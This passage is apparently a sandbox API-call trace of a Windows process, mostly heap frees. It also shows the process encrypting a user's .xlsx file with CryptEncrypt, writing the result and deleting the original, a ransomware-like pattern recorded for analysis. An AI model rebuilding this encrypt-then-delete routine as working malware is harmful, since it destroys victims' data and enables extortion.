hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0075.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0075.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0075.819] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0075.820] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2560, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2560*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0075.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.821] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.822] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.822] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0075.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0075.823] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.825] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x12292, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x122a0) returned 1 [0075.825] CharLowerBuffW (in: lpsz="byte[74401]", cchLength=0xb | out: lpsz="byte[74401]") returned 0xb [0075.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caaf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.828] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4441b98*, pdwDataLen=0x144e790*=0x12292, dwBufLen=0x122a0 | out: pbData=0x4441b98*, pdwDataLen=0x144e790*=0x122a0) returned 1 [0075.828] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.830] WriteFile (in: hFile=0x258, lpBuffer=0x441d660*, nNumberOfBytesToWrite=0x122a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x441d660*, lpNumberOfBytesWritten=0x144f194*=0x122a0, lpOverlapped=0x0) returned 1 [0075.832] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca538, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0075.832] CryptDestroyKey (hKey=0x41ac600) returned 1 [0075.832] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.832] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.833] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0075.833] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0075.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.833] FreeLibrary (hLibModule=0x756e0000) returned 1 [0075.833] CloseHandle (hObject=0x298) returned 1 [0075.833] CloseHandle (hObject=0x258) returned 1 [0075.841] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx", lpFilePart=0x0) returned 0x30 [0075.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0075.841] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\aotbgaayxtk159gxw.xlsx")) returned 0x20 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0075.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0075.842] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde3f130, ftCreationTime.dwHighDateTime=0x1d5bec0, ftLastAccessTime.dwLowDateTime=0xe3ed4f80, ftLastAccessTime.dwHighDateTime=0x1d5ee5c, ftLastWriteTime.dwLowDateTime=0xe3ed4f80, ftLastWriteTime.dwHighDateTime=0x1d5ee5c, nFileSizeHigh=0x0, nFileSizeLow=0x12292, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="aOtbGAAYxtk159gxW.xlsx", cAlternateFileName="AOTBGA~1.XLS")) returned 0x41ac140 [0075.842] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\aotbgaayxtk159gxw.xlsx")) returned 1 [0075.899] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde3f130, ftCreationTime.dwHighDateTime=0x1d5bec0, ftLastAccessTime.dwLowDateTime=0xe3ed4f80, ftLastAccessTime.dwHighDateTime=0x1d5ee5c, ftLastWriteTime.dwLowDateTime=0xe3ed4f80, ftLastWriteTime.dwHighDateTime=0x1d5ee5c, nFileSizeHigh=0x0, nFileSizeLow=0x12292, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="aOtbGAAYxtk159gxW.xlsx", cAlternateFileName="AOTBGA~1.XLS")) returned 0 [0075.900] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0075.900] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0075.900] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree 